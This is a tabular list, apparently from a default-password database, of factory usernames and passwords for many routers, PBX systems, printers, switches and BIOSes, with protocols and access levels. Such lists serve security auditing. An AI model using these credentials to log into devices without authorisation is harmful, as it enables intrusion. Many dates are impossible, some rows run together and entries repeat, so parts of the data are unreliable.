Nokia DSL Router M1122 1.1 – 1.2 Multi m1122 m1122 User No 2003-1-1 2005-13-7
Nokia MW1122 Multi telecom telecom Admin Only in New Zealand. No 2003-22-1 2005-13-7
Nortel Meridian Link Multi disttech 4tas engineer account No 2002-1-10 2005-13-7
Nortel Meridian Link Multi maint maint Maintenance account No 2002-1-10 2005-13-7
Nortel Meridian Link Multi mlusr mlusr user account No 2002-1-10 2005-13-7
Nortel Remote Office 9150 Client admin root Admin No 2002-1-10 2005-13-7
Nortel Accelar (Passport) 1000 series routing switches Multi l2 l2 Layer 2 Read Write No 2002-1-10 2005-13-7
Nortel Accelar (Passport) 1000 series routing switches Multi l3 l3 Layer 3 (and layer 2) Read Write No 2002-1-10 2005-13-7
Nortel Accelar (Passport) 1000 series routing switches Multi ro ro Read Only No 2002-1-10 2005-13-7
Nortel Accelar (Passport) 1000 series routing switches Multi rw rw Read Write No 2002-1-10 2005-13-7
Nortel Accelar (Passport) 1000 series routing switches Multi rwa rwa Read Write All No 2002-1-10 2005-13-7
Nortel Extranet Switches Multi admin setup Admin No 2002-1-10 2005-13-7
Nortel Baystack 350-24T Telnet n/a secure Admin No 2002-1-10 2005-13-7
Nortel Meridian PBX Serial login 0 AUTH codes in LD 8 No 2002-1-10 2005-13-7
Nortel Meridian PBX Serial login 1111 AUTH codes in LD 8 No 2002-1-10 2005-13-7
Nortel Meridian PBX Serial login 8429 AUTH codes in LD 8 No 2002-1-10 2005-13-7
Nortel Meridian PBX Serial spcl 0 AUTH codes in LD 8 No 2002-1-10 2005-13-7
Nortel Meridian MAX Multi service smile general engineer account No 2002-1-10 2005-13-7
Nortel Meridian MAX Multi root 3ep5w2u Admin No 2002-1-10 2005-13-7
Nortel Matra 6501 PBX Console (none) 0 Admin No 2002-1-10 2005-13-7
Nortel Meridian MAX Multi maint ntacdmax Maintenance account No 2002-1-10 2005-13-7
Nortel Meridian CCR Multi service smile general engineer account No 2002-1-10 2005-13-7
Nortel Meridian CCR Multi disttech 4tas engineer account enter 3letter of day from yesterday an tomorrow (for Tuesday enter MonWed case sensitive) – may be twice to see root password in clear No 2002-1-10 2005-13-7
Nortel Meridian CCR Multi maint maint Maintenance account No 2002-1-10 2005-13-7
Nortel Meridian CCR Multi ccrusr ccrusr User account No 2002-1-10 2005-13-7
Nortel Meridian Multi n/a (none) Admin No 2002-1-10 2005-13-7
Nortel Meridian Link Multi service smile general engineer account No 2002-1-10 2005-13-7
Nortel Contivity Extranet/VPN switches HTTP admin setup Admin No 2003-23-4 2005-13-7
Nortel Business Communications Manager 3.5 and 3.6 HTTPS supervisor PlsChgMe Admin there is an exclamation point at the end of the password No 2004-9-7 2005-13-7
Nortel Phone System All From Phone n/a 266344 Installers No 2004-14-7 2005-13-7
Nortel Norstar Console 266344 266344 Admin No 2003-1-1 2005-13-7
Nullsoft Shoutcast 1.9.5 PLS admin changeme Admin 2006-00-05 2006-00-05
OKI C5700 HTTP root the 6 last digit of the MAC adress Admin running with other models 2006-06-28 2006-06-28
OMRON MR104FH Multi n/a (none) Admin No 2003-18-7 2005-13-7
Omnitronix Data-Link DL150 Multi (none) SUPER Admin No 2004-20-11 2005-13-7
Omnitronix Data-Link DL150 Multi (none) SMDR Admin No 2004-20-11 2005-13-7
OpenConnect OC://WebConnect Pro Multi admin OCS Admin No 2003-1-1 2005-13-7
OpenConnect OC://WebConnect Pro Multi adminstat OCS Admin No 2003-1-1 2005-13-7
OpenConnect OC://WebConnect Pro Multi adminview OCS Admin No 2003-1-1 2005-13-7
OpenConnect OC://WebConnect Pro Multi adminuser OCS Admin No 2003-1-1 2005-13-7
OpenConnect OC://WebConnect Pro Multi adminview OCS Admin No 2003-1-1 2005-13-7
OpenConnect OC://WebConnect Pro Multi helpdesk OCS Admin No 2003-1-1 2005-13-7
Openwave WAP Gateway Any HTTP sys uplink Admin No 2003-1-1 2005-13-7
Openwave MSP Any HTTP cac_admin cacadmin Admin No 2003-1-1 2005-13-7
Oracle Oracle RDBMS Any Multi system/manager sys/change_on_install Admin 2005-08-20 2005-08-20
Osicom NETPrint 500 1000 1500 and 2000 Series Telnet Manager Manager Admin No 2003-1-1 2005-13-7
Osicom NETPrint and JETX Print 500 1000 1500 and 2000 Series Telnet sysadm sysadm Admin No 2003-1-1 2005-13-7
Osicom Osicom Plus T1/PLUS 56k Telnet write private No 2002-1-10 2005-13-7
Osicom NETCommuter Remote Access Server Telnet debug d.e.b.u.g User No 2002-1-10 2005-13-7
Osicom NETCommuter Remote Access Server Telnet echo echo User No 2002-1-10 2005-13-7
Osicom NETCommuter Remote Access Server Telnet guest guest User No 2002-1-10 2005-13-7
Osicom NETCommuter Remote Access Server Telnet Manager Manager Admin No 2002-1-10 2005-13-7
Osicom NETCommuter Remote Access Server Telnet sysadm sysadm Admin No 2002-1-10 2005-13-7
Osicom Osicom Plus T1/PLUS 56k write private No 2003-1-1 2005-13-7
Osicom NETCommuter Remote Access Server Telnet sysadm sysadm Admin No 2003-2-1 2005-13-7
Osicom JETXPrint 1000E/B Telnet sysadm sysadm Admin No 2003-3-1 2005-13-7
Osicom JETXPrint 1000E/N Telnet sysadm sysadm Admin No 2003-4-1 2005-13-7
Osicom JETXPrint 1000T/N Telnet sysadm sysadm Admin No 2003-5-1 2005-13-7
Osicom JETXPrint 500 E/B Telnet sysadm sysadm Admin No 2003-6-1 2005-13-7
Osicom NETPrint "500 1000 1500 and 2000 Series" Telnet Manager Manager Admin 657 Osicom NETPrint "500 1000 1500 and 2000 Series" Telnet guest guest User 658 Osicom NETPrint "500 1000 1500 and 2000 Series" Telnet echo echo User 659 Osicom NETPrint "500 1000 1500 and 2000 Series" Telnet debug d.e.b.u.g User 660 OVISLINK WL8000AP WIRELESS G HTTP 12345 12345 Admin IP: 192.168.1.252 No 2005-6-3 2005-13-7
Pacific Micro Data MAST 9500 Universal Disk Array ESM ver. 2.11 / 1 Console pmd (none) Admin No 2002-1-10 2005-13-7
Panasonic CF-28 Multi n/a (none) Admin No 2004-25-5 2005-13-7
Panasonic CF-45 Multi n/a (none) Admin No 2004-8-7 2005-13-7
Panasonic PBX TDA 100/200/400 all Console (none) 1234 Admin google.com search q panasonic pbx tda 100 default password 2006-08-26 2006-08-26
Pansonic KXTD1232 Multi admin 1234 Admin 2005-08-27 2005-08-27
PentaSafe VigilEnt Security Manager 3 VigilEnt Security Manager Console PSEAdmin $secure$ Admin No 2002-1-10 2005-13-7
Pentagram Cerberus ADSL modem + router HTTP admin password Admin 2006-02-21 2006-02-21
Pentaoffice Sat Router Telnet (none) pento Admin 2006-02-01 2006-02-01
Perle CS9000 any Console admin superuser Admin No 2004-24-1 2005-13-7
Phoenix v1.14 Phoenix v1.14 Multi Administrator admin Admin 2005-10-25 2005-10-25
Pirelli Pirelli Router Multi admin mu Admin No 2003-3-10 2005-13-7
Pirelli Pirelli Router Multi admin microbusiness Admin No 2003-3-10 2005-13-7
Pirelli Pirelli Router Multi user password Admin No 2003-3-10 2005-13-7
Pirelli Pirelli AGE-SB HTTP admin smallbusiness Admin 2005-10-07 2005-10-07
Pirelli AGE ADSL Router Multi admin microbusiness Admin 2006-02-01 2006-02-01
Pirelli AGE ADSL Router Multi user password User 2006-02-01 2006-02-01
Planet WAP-1900/1950/2000 2.5.0 Multi (none) default Admin No 2002-1-10 2005-13-7
Planet ADE-4110 HTTP admin epicrouter Admin 2006-03-18 2006-03-18
Planet XRT-401D HTTP admin 1234 Admin 2006-03-18 2006-03-18
Planet ADE-4000 Multi admin epicrouter Admin 2006-03-18 2006-03-18
Polycom Soundpoint VoIP phones HTTP Polycom SpIp User No 2004-8-10 2005-13-7
Polycom ViewStation 4000 3.5 Multi (none) admin Admin No 2004-8-10 2005-13-7
Polycom iPower 9000 Multi (none) (none) Admin No 2004-8-10 2005-13-7
Prestigio Nobile 156 Multi n/a (none) Admin No 2005-01-17 2005-13-7
Proxim Orinoco 600/2000 All HTTP (none) (none) Admin WLAN accesspoint 2006-01-07 2006-01-07
Psion Teklogix 9150 HTTP support h179350 Admin No 2005-3-4 2005-13-7
Psionteklogix 9160 1.0 HTTP admin admin Admin 2006-08-05 2006-08-05
Psionteklogix 9160 1.0 HTTP admin admin Admin 2006-08-06 2006-08-06
Pyramid Computer BenHur all HTTP admin admin Admin No 2002-1-10 2005-13-7
Quintum Technologies Inc. Tenor Series all Multi admin admin Admin 2006-04-19 2006-04-19
RM RM Connect Multi setup changeme No 2002-1-10 2005-13-7
RM RM Connect Multi teacher password No 2002-1-10 2005-13-7
RM RM Connect Multi temp1 password No 2002-1-10 2005-13-7
RM RM Connect Multi admin rmnetlm No 2002-1-10 2005-13-7
RM RM Connect Multi admin2 changeme No 2002-1-10 2005-13-7
RM RM Connect Multi adminstrator changeme No 2002-1-10 2005-13-7
RM RM Connect Multi deskalt password No 2002-1-10 2005-13-7
RM RM Connect Multi deskman changeme No 2002-1-10 2005-13-7
RM RM Connect Multi desknorm password No 2002-1-10 2005-13-7
RM RM Connect Multi deskres password No 2002-1-10 2005-13-7
RM RM Connect Multi guest (none) No 2002-1-10 2005-13-7
RM RM Connect Multi replicator replicator No 2002-1-10 2005-13-7
RM RM Connect Multi RMUser1 password No 2002-1-10 2005-13-7
RM RM Connect Multi topicalt password No 2002-1-10 2005-13-7
RM RM Connect Multi topicnorm password No 2002-1-10 2005-13-7
RM RM Connect Multi topicres password No 2002-1-10 2005-13-7
Radware Linkproof ssh lp lp Admin No 2003-22-8 2005-13-7
Radware Linkproof 3.73.03 Multi radware radware Admin No 2004-9-7 2005-13-7
Raidzone raid arrays n/a raidzone No 2002-1-10 2005-13-7
Ramp Networks WebRamp wradmin trancell No 2002-1-10 2005-13-7
Ramp Networks WebRamp wradmin trancell No 2003-1-1 2005-13-7
RedHat Redhat 6.2 HTTP piranha q User No 2002-1-10 2005-13-7
RedHat Redhat 6.2 HTTP piranha piranha User No 2002-1-10 2005-13-7
Research PC BIOS Console n/a Col2ogro2 Admin No 2002-1-10 2005-13-7
Research BIOS Console n/a Col2ogro2 Admin No 2003-1-1 2005-13-7
Ricoh Aficio AP3800C HTTP sysadmin password Admin No 2003-3-6 2005-13-7
Ricoh Aficio 2228c Multi sysadmin password Admin Webpage admin 2005-07-30 2005-07-30
Ricoh Aficio AP3800C 2.17 HTTP (none) password Admin alternative to sysadmin and Admin 2006-04-05 2006-04-05
Ricoh Aficio 2232C Telnet n/a password Admin 2006-04-05 2006-04-05
Ricoh AP410N 1.13 HTTP admin (none) Admin 2006-05-21 2006-05-21
Ricoh Aficio 2020D HTTP admin password Admin 2006-06-31 2006-06-31
RoamAbout RoamAbout R2 Wireless Access Platform Multi admin password Admin No 2003-14-9 2005-13-7
SAGEM FAST 1400 Multi admin epicrouter Admin 2006-03-18 2006-03-18
SIEMENS SE515 HTTP admin n/a Admin No 2004-9-7 2005-13-7
SMC Barricade 7004 AWBR Multi admin (none) Admin 192.168.123.254 (WiFi AP) No 2002-1-10 2005-13-7
SMC Router All HTTP admin admin Admin No 2002-1-10 2005-13-7
SMC SMC broadband router HTTP admin admin Admin No 2003-13-6 2005-13-7
SMC SMC2804WBR v.1 HTTP (none) smcadmin Admin No 2004-01-01 2005-13-7
SMC WiFi Router All HTTP n/a smcadmin Admin model #2804WBRP-G No 2004-18-5 2005-13-7
SMC SMB2804WBR V2 Multi Administrator smcadmin Admin No 2004-22-5 2005-13-7
SMC 7401BRA 1 HTTP admin barricade Admin No 2004-13-6 2005-13-7
SMC 7401BRA 2 HTTP smc smcadmin Admin No 2004-13-6 2005-13-7
SMC Barricade7204BRB HTTP admin smcadmin Admin No 2005-01-23 2005-13-7
SMC 2804wr HTTP (none) smcadmin Admin No 2005-24-2 2005-13-7
SMC Router/Modem BR7401 Multi admin barricade Admin 2006-00-04 2006-00-04
SMC SMCWBR14-G SMCWBR14-G HTTP (none) smcadmin Admin 2006-02-02 2006-02-02
SMC Modem/Router HTTP cusadmin highspeed Customer Admin Comcast Commercial High Speed Modem model number 8013WG 2006-03-05 2006-03-05
SMC 7204BRA Multi smc smcadmin Admin 2006-03-18 2006-03-18
SMC SMCWBR14-G HTTP n/a smcadmin Admin mentioned password (no passwd) on your webpage is wrong 2006-04-03 2006-04-03
SMC smc7904wbrb Multi (none) smcadmin Admin 2006-09-12 2006-09-12
SMC SMC7004VBR HTTP n/a smcadmin Admin 2006-08-21 2006-08-21
SOPHIA (Schweiz) AG Protector HTTPS admin Protector Admin No 2005-26-4 2005-13-7
SOPHIA (Schweiz) AG Protector SSH root root Admin No 2005-26-4 2005-13-7
SSA BPCS Up to 5.02 Multi SSA SSA Admin rarely changed/used for upgrades-patches 2006-08-11 2006-08-11
Sagem F@st 1200 (Fast 1200) Telnet root 1234 User root/1234 2006-06-30 2006-06-30
Samsung MagicLAN SWL-3500RG 2.15 HTTP public public Admin def. WEP keys: 0123456789 1518896203 No 2004-22-1 2005-13-7
Scientific Atlanta DPX2100 Comcast-supplied HTTP admin w2402 diagnostics page 192.168.100.1 2006-06-14 2006-06-14
Secure Computing Webwasher all HTTP admin (none) Admin 2006-08-12 2006-08-12
Senao 2611CB3+D (802.11b Wireless AP) HTTP admin (none) Admin Default IP: 192.168.1.1 No 2004-13-4 2005-13-7
Sercom IP806GA HTTP admin admin Admin 2006-09-24 2006-09-24
Sercom IP806GB HTTP admin admin Admin 2006-09-24 2006-09-24
Server Technology Sentry Remote Power Manager Multi GEN1 gen1 view/control Telnet port 2001 No 2002-1-10 2005-13-7
Server Technology Sentry Remote Power Manager Multi GEN2 gen2 view/control Telnet port 2001 No 2002-1-10 2005-13-7
Server Technology Sentry Remote Power Manager Multi ADMN admn Admin Telnet port 2001 No 2002-1-10 2005-13-7
Sharp AR-M355N HTTP admin Sharp Admin 2006-09-18 2006-09-18
Sharp MX-3501n HTTP Administrator admin Admin 2006-09-18 2006-09-18
Siemens ROLM PBX eng engineer No 2002-1-10 2005-13-7
Siemens ROLM PBX op op No 2002-1-10 2005-13-7
Siemens ROLM PBX op operator No 2002-1-10 2005-13-7
Siemens ROLM PBX su super No 2002-1-10 2005-13-7
Siemens PhoneMail poll tech No 2002-1-10 2005-13-7
Siemens PhoneMail sysadmin sysadmin No 2002-1-10 2005-13-7
Siemens ROLM PBX admin pwp No 2002-1-10 2005-13-7
Siemens PhoneMail tech tech No 2002-1-10 2005-13-7
Siemens 5940 T1E1 Router 5940-001 v6.0.180-2 Telnet superuser admin Admin No 2004-25-10 2005-13-7
Siemens PhoneMail poll tech No 2003-1-1 2005-13-7
Siemens PhoneMail sysadmin sysadmin No 2003-1-1 2005-13-7
Siemens PhoneMail tech tech No 2003-2-1 2005-13-7
Siemens ROLM PBX admin pwp No 2003-3-1 2005-13-7
Siemens ROLM PBX eng engineer No 2003-4-1 2005-13-7
Siemens ROLM PBX op op No 2003-5-1 2005-13-7
Siemens ROLM PBX op operator No 2003-6-1 2005-13-7
Siemens ROLM PBX su super No 2003-7-1 2005-13-7
Siemens SpeedStream 4100 HTTP admin hagpolm1 Admin DSL Modem and Router 2005-10-03 2005-10-03
Siemens SE560dsl Multi admin admin Admin Also has an account with: user/user 2006-07-30 2006-07-30
Siemens Nixdorf PC BIOS Console n/a SKY_FOX Admin No 2002-1-10 2005-13-7
Siemens Nixdorf BIOS Console n/a SKY_FOX Admin No 2003-1-1 2005-13-7
Siemens Pro C5 Siemens Multi n/a (none) Admin No 2004-18-1 2005-13-7
Sigma Sigmacoma IPshare Sigmacom router v1.0 HTTP admin admin Admin effes2004@gmail.com 2005-07-17 2005-07-17
Signamax 065-7726S Multi admin admin Admin Switch 2006-08-04 2006-08-04
Siips Trojan 8974202 Multi Administrator ganteng Admin Thx No 2002-1-10 2005-13-7
Silvercrest WR-6640Sg HTTP admin admin Admin 2006-10-19 2006-10-19
Sitecom All WiFi routers Multi (none) sitecom Admin No 2004-24-5 2005-13-7
SmartSwitch Router 250 ssr2500 v3.0.9 Multi admin (none) Admin No 2002-1-10 2005-13-7
Snapgear "Pro Lite and SOHO" 1.79 + Multi root default Admin Before 1.79 no user name req. N 752 SOHOWARE NBG800 HTTP admin 1234 Admin No 2004-02-31 2005-13-7
Solution 6 Viztopia Accounts Multi aaa often blank Admin No 2004-25-7 2005-13-7
Sonic-X SonicAnime on Telnet root admin Admin 101010100001010 2005-09-28 2005-09-28
SonicWALL ALL ALL HTTP admin password Admin No 2002-1-10 2005-13-7
Sorenson SR-200 HTTP (none) admin Admin 2005-11-16 2005-11-16
SpeedStream 5660 Telnet n/a adminttd Admin No 2004-28-1 2005-13-7
SpeedXess HASE-120 Multi (none) speedxess Admin No 2002-1-10 2005-13-7
Speedstream 5861 SMT Router Multi admin admin Admin No 2002-1-10 2005-13-7
Speedstream 5871 IDSL Router Multi admin admin Admin No 2002-1-10 2005-13-7
Speedstream Router 250 ssr250 Multi admin admin Admin No 2002-1-10 2005-13-7
Speedstream DSL Multi admin admin Admin No 2002-1-10 2005-13-7
Speedstream 5667 R4.0.1 HTTP (none) admin Admin No 2003-23-6 2005-13-7
Spike CPE Console enable (none) Admin No 2002-1-10 2005-13-7
Sun JavaWebServer 1.x 2.x AdminSrv admin admin Admin No 2002-1-10 2005-13-7
Sun Cobalt HTTP admin admin Admin submit by Nabil Ouchn 2005-09-03 2005-09-03
Sun Microsystems ILOM of X4100 1.0 HTTP root changeme Admin 2006-01-16 2006-01-16
Swissvoice IP 10S Telnet target password Admin 2005-10-13 2005-10-13
Sybase EAServer HTTP jagadmin (none) Admin Source : Manufactor documentation 2005-06-22 2005-06-22
Symbol Spectrum series 4100-4121 HTTP n/a Symbol Admin Access Point Wireless No 2003-25-8 2005-13-7
Symbol AP-2412 Multi n/a Symbol Admin 2Mbps FH AccessPoint 2005-10-30 2005-10-30
Symbol AP-3020 Multi n/a Symbol Admin 2Mbps FH AccessPoint 2005-10-30 2005-10-30
Symbol AP-4111 Multi n/a Symbol Admin 11Mbps DS AccessPoint 2005-10-30 2005-10-30
Symbol AP-4121 Multi n/a Symbol Admin 11Mbps DS AccessPoint 2005-10-30 2005-10-30
Symbol AP-4131 Multi n/a Symbol Admin 11Mbps DS AccessPoint 2005-10-30 2005-10-30
Symbol CB3000 A1 HTTPS admin symbol Admin Default IP 10.10.1.1 2006-08-22 2006-08-22
System/32 VOS Multi install secret Admin 2006-02-01 2006-02-01
T-Comfort Routers HTTP Administrator (none) Admin No 2004-21-11 2005-13-7
TANDBERG TANDBERG 8000 Multi (none) TANDBERG Admin http://www.tandberg.net/collateral/user_manuals/TANDBERG_8000_UserMan.pdf Yes 2004-10-4 2005-13-7
TVT System Expresse G5 Multi craft (none) Admin No 2002-1-10 2005-13-7
TVT System Expresse G5 DS1 Module Multi (none) enter Admin No 2002-1-10 2005-13-7
Tandberg 6000MXP Multi Admin (none) Admin 2006-10-01 2006-10-01
Tandberg Data DLT8000 Autoloader 10x Console n/a 0000010023 Maintenance 2005-10-15 2005-10-15
Tandem TACL Multi super.super (none) Admin 2006-02-01 2006-02-01
Tandem TACL Multi super.super master Admin 2006-02-01 2006-02-01
Team Xodus XeniumOS 2.3 FTP xbox xbox Admin No 2005-1-4 2005-13-7
Teklogix Accesspoint Multi Administrator (none) Admin No 2002-1-9 2005-13-7
Telco Systems Edge Link 100 Console telco telco telco 2006-04-02 2006-04-02
Teledat Routers HTTP admin 1234 Admin No 2004-21-11 2005-13-7
Teletronics WL-CPE-Router 3.05.2 HTTPS admin 1234 Admin No 2005-24-3 2005-13-7
Telewell TW-EA200 Multi admin password Admin No 2004-9-7 2005-13-7
Telindus 1124 HTTP n/a (none) Admin No 2004-17-8 2005-13-7
Telindus SHDSL1421 yes HTTP admin admin Admin No 2005-01-30 2005-13-7
Tellabs Titan 5500 FP 6.x Multi tellabs tellabs#1 Admin No 2002-1-10 2005-13-7
Tellabs 7120 Multi root admin_1 Admin telnet on port 3083 No 2005-3-1 2005-13-7
Terayon Unknown Comcast-supplied HTTP (none) (none) diagnostics page 192.168.100.1/diagnostics_page.html 2006-06-14 2006-06-14
Terayon Unknown Comcast-supplied HTTP (none) (none) diagnostics page 192.168.100.1/diagnostics_page.html 2006-06-14 2006-06-14
Tiara 1400 3.x Console tiara tiaranet Admin also known as Tasman Networks routers No 2003-14-7 2005-13-7
Topcom Wireless Webr@cer 1154+ PSTN (Annex A) V 4.00.0 HTTP admin admin Admin G+ mode (125Mbps) integration 2006-09-24 2006-09-24
Topcom Wireless Webr@cer 1154+ PSTN (Annex A) V 0.01.06 HTTP admin admin Admin WPA-PSK implemented 2006-09-24 2006-09-24
Topcom Wireless Webr@cer 1154+ PSTN (Annex A) V 0.01.09 HTTP admin admin Admin Improved wireless stability 2006-09-24 2006-09-24
Troy ExtendNet 100zx Multi admin extendnet Admin dizphunKt No 2003-18-5 2005-13-7
U.S. Robotics SureConnect 9003 ADSL Ethernet/USB Router Multi root 12345 Admin 2006-03-18 2006-03-18
U.S. Robotics SureConnect 9105 ADSL 4-Port Router HTTP admin admin Admin 2006-03-18 2006-03-18
UNEX Routers HTTP n/a password Admin No 2004-21-11 2005-13-7
US ROBOTICS ADSL Ethernet Modem HTTP (none) 12345 Admin No 2002-1-10 2005-13-7
US Robotics USR8000 1.23 / 1.25 Multi root admin Admin DSL-Router. Web-Login always uses user root No 2002-1-10 2005-13-7
US Robotics USR8550 3.0.5 Multi Any 12345 Any Best Modem No 2002-1-10 2005-13-7
US Robotics SureConnect ADSL SureConnect ADSL Telnet support support User works after 3rd login trial No 2005-9-3 2005-13-7
US Robotics USR9110 HTTP admin (none) Admin default IP subnet: 192.168.1.0 2006-08-04 2006-08-04
Unisys ClearPath MCP Multi NAU NAU Privileged Network Administration Utility No 2003-2-7 2005-13-7
Unisys ClearPath MCP Multi ADMINISTRATOR ADMINISTRATOR Admin No 2003-2-7 2005-13-7
Unisys ClearPath MCP Multi HTTP HTTP Web Server Administration No 2003-2-7 2005-13-7
VASCO VACMAN Middleware 2.x Multi admin (none) Admin strong authentication server No 2004-4-9 2005-13-7
Verifone Verifone Junior 2.05 (none) 166816 No 2002-1-10 2005-13-7
Verilink NE6100-4 NetEngine IAD 3.4.8 Telnet (none) (none) Guest No 2004-27-6 2005-13-7
Visual Networks Visual Uptime T1 CSU/DSU 1 Console admin visual Admin No 2005-13-4 2005-13-7
VxWorks misc Multi admin admin Admin 2006-02-01 2006-02-01
VxWorks misc Multi guest guest Guest 2006-02-01 2006-02-01
Wanadoo Livebox Multi admin admin Admin 2005-10-04 2005-10-04
Wang Wang Multi CSG SESAME Admin 2006-02-01 2006-02-01
Watch guard firebox 1000 Multi admin (none) Admin No 2002-1-10 2005-13-7
Watchguard SOHO and SOHO6 all versions FTP user pass Admin works only from the inside LAN No 2003-8-6 2005-13-7
Westell Versalink 327 Multi admin (none) Admin No 2005-1-3 2005-13-7
Westell Wirespeed Multi admin password Admin also try password: sysAdmin 2005-08-05 2005-08-05
Westell Wang Multi CSG SESAME Admin 2006-02-01 2006-02-01
Westell Wirespeed wireless router Multi admin sysAdmin Admin 2006-02-01 2006-02-01
Wyse Winterm 5440XL Console root wyse Admin No 2002-1-10 2005-13-7
Wyse Winterm 5440XL VNC VNC winterm VNC No 2002-1-10 2005-13-7
Wyse Winterm 9455XL BIOS (none) Fireport BIOS Case Sensitive No 2003-7-7 2005-13-7
Wyse winterm Multi root (none) Admin No 2003-19-10 2005-13-7
Wyse rapport 4.4 FTP rapport r@p8p0r+ ftp logon to controlling ftp server. No 2005-1-1 2005-13-7
Wyse Winterm 3150 VNC n/a password Admin by satadru 2006-04-05 2006-04-05
X-Micro X-Micro WLAN 11b Broadband Router 1.2.2 1.2.2.3 1.2.2.4 1.6.0.0 Multi super super Admin From BUGTRAQ No 2004-19-3 2005-13-7
X-Micro X-Micro WLAN 11b Broadband Router 1.6.0.1 HTTP 1502 1502 Admin From BUGTRAQ No 2004-19-3 2005-13-7
X-Micro WLAN 11b Access Point 1.2.2 Multi super super Admin http://secunia.com/advisories/11342/ No 2004-30-6 2005-13-7
Xavi 7000-ABA-ST1 Console n/a (none) Admin No 2004-6-8 2005-13-7
Xavi 7001 Console n/a (none) Admin No 2004-6-8 2005-13-7
Xerox Multi Function Equipment Multi admin 2222 Admin combo fax/scanner/printer with network access No 2002-1-10 2005-13-7
Xerox WorkCenter Pro 428 HTTP admin admin Admin No 2002-1-10 2005-13-7
Xerox Document Centre 425 HTTP admin (none) Admin No 2004-8-9 2005-13-7
Xerox DocuCentre 425 HTTP admin 22222 Admin works for access panel 2 2005-11-07 2005-11-07
Xerox Document Centre 405 – HTTP admin admin Admin 2006-01-02 2006-01-02
Xerox 240a HTTP admin x-admin Admin 2006-08-25 2006-08-25
Xylan Omniswitch Telnet admin switch Admin Yes 2002-1-10 2005-13-7
Xylan Omniswitch Telnet diag switch Admin Yes 2002-1-10 2005-13-7
Xylan omniswitch Multi admin switch Admin Yes 2002-1-10 2005-13-7
Xyplex Routers Port 7000 n/a system Admin No 2002-1-10 2005-13-7
Xyplex Terminal Server Port 7000 n/a access User No 2002-1-10 2005-13-7
Xyplex Terminal Server Port 7000 n/a system Admin No 2002-1-10 2005-13-7
Xyplex Routers Port 7000 n/a access User No 2002-1-10 2005-13-7
Xyplex Routers Port 7000 n/a access User No 2002-1-10 2005-13-7
Xyplex Terminal Server Port 7000 n/a access User No 2002-1-10 2005-13-7
Xyplex Terminal Server Port 7000 n/a system Admin No 2002-1-10 2005-13-7
Yakumo Routers HTTP admin admin Admin No 2004-21-11 2005-13-7
ZOOM ZOOM ADSL Modem Console admin zoomadsl Admin No 2004-28-9 2005-13-7
Zcom Wireless SNMP root admin Admin No 2002-1-10 2005-13-7
Zebra 10/100 Print Server Multi admin 1234 Admin 2005-11-28 2005-11-28
ZyXEL Prestige HTTP n/a 1234 Admin http://192.168.1.1 Yes 2002-1-10 2005-13-7
ZyXEL Prestige FTP root 1234 Admin Yes 2002-1-10 2005-13-7
ZyXEL Prestige Telnet (none) 1234 Admin Yes 2002-1-10 2005-13-7
ZyXEL Prestige 643 Console (none) 1234 Admin Yes 2004-12-3 2005-13-7
ZyXEL Prestige 652HW-31 ADSL Router HTTP admin 1234 Admin http://192.168.1.1 Yes 2004-22-2 2005-13-7
ZyXEL Prestige 100IH Console n/a 1234 Admin Yes 2004-12-3 2005-13-7
ZyXEL Prestige 650 Multi 1234 1234 Admin No 2004-30-11 2005-13-7
ZyXEL Prestige 900 HTTP webadmin 1234 Admin 192.168.1.1:8080 2006-00-10 2006-00-10
ZyXEL Prestige 645 HTTP admin 1234 Admin 2006-03-25 2006-03-25
ZyXEL ZyWALL Series Prestige 660R-61C Multi n/a admin Admin 2006-04-03 2006-04-03
ZyXel Prestige P660HW Multi admin 1234 Admin 2006-07-20 2006-07-20
Zyxel ZyWall 2 HTTP n/a (none) Admin No 2004-14-5 2005-13-7
Zyxel adsl routers All ZyNOS Firmwares Multi admin 1234 Admin this is default for dsl routers provided by the ISP firstmile.no No 2004-28-10 2005-13-7
Zyxel Prestige 660HW Multi admin admin Admin 2006-06-19 2006-06-19
Zyxel Router 650-1 Telnet (none) 1234 Admin Telefonica 2006-08-27 2006-08-27
accton t-online accton Multi (none) 0 Admin No 2004-8-1 2005-13-7
accton t-online accton Multi (none) 0 Admin No 2004-8-1 2005-13-7
adtran MX2800 Telnet n/a adtran Admin hit enter a few times Yes 2002-1-10 2005-13-7
adtran Smart 16/16e Telnet n/a (none) Admin hit enter a few times Yes 2004-9-2 2005-13-7
adtran Atlas 800/800Plus/810Plus/550 Telnet n/a Password Admin crtl-L Yes 2004-9-2 2005-13-7
adtran Smart 16/16e Telnet n/a PASSWORD Admin hit enter a few times Yes 2004-9-2 2005-13-7
adtran NxIQ Telnet n/a adtran Admin hit enter a few times Yes 2004-9-2 2005-13-7
adtran TSU IQ/DSU IQ Telnet n/a (none) Admin hit enter a few times Yes 2004-9-2 2005-13-7
adtran Express 5110/5200/5210 Telnet n/a adtran Admin hit enter a few times Yes 2004-9-2 2005-13-7
adtran Agent Card Telnet n/a ADTRAN Admin ctrl-PTT Yes 2004-9-2 2005-13-7
adtran TSU Router Module/L128/L768/1.5 Telnet n/a (none) Admin hit enter a few times Yes 2004-9-2 2005-13-7
adtran T3SU 300 Telnet n/a adtran Admin Hit enter a few times Yes 2004-9-2 2005-13-7
apc Smartups 3000 HTTP apc apc Admin By Sentinel Software.net No 2004-11-7 2005-13-7
apple airport5 1.0.09 Multi root admin Admin 192.168.1.1 2006-00-03 2006-00-03
asmack router ar804u HTTP admin epicrouter Admin 2006-02-03 2006-02-03
asus WL500g HTTP admin admin Admin 2005-10-28 2005-10-28
axis 2100 Multi n/a (none) Admin No 2005-29-3 2005-13-7
aztech DSL-600E HTTP admin admin Admin 2006-04-12 2006-04-12
canyon router Multi Administrator admin Admin 2006-02-09 2006-02-09
cisco cva 122 Telnet admin admin Admin No 2002-1-10 2005-13-7
cisco 3600 Telnet Administrator admin Guest No 2003-28-10 2006-10-15
cisco GSR Telnet admin admin admin No 2004-14-11 2005-13-7
cisco 2600 Telnet Administrator admin Admin 2006-00-25 2006-00-25
comtrend ct536+ Multi admin (none) Admin 2006-04-14 2006-04-14
conexant ACCESS RUNNER ADSL CONSOLE PORT 3.27 Telnet Administrator admin Admin No 2005-15-4 2005-13-7
corecess 3113 Multi admin (none) Admin 2006-03-07 2006-03-07
creative 2015U Multi n/a (none) Admin 2005-10-13 2005-10-13
cuproplus bus Multi n/a (none) Admin 2006-09-29 2006-09-29
cyberguard all firewalls all console + passport1 cgadmin cgadmin Admin No 2003-22-1 2005-13-7
d-link 504g adsl router HTTP admin admin Admin from product doco No 2004-27-9 2005-13-7
d-link di-524 HTTP admin (none) Admin 2006-03-13 2006-03-13
d-link ads500g HTTP admin admin Admin 2006-09-16 2006-09-16
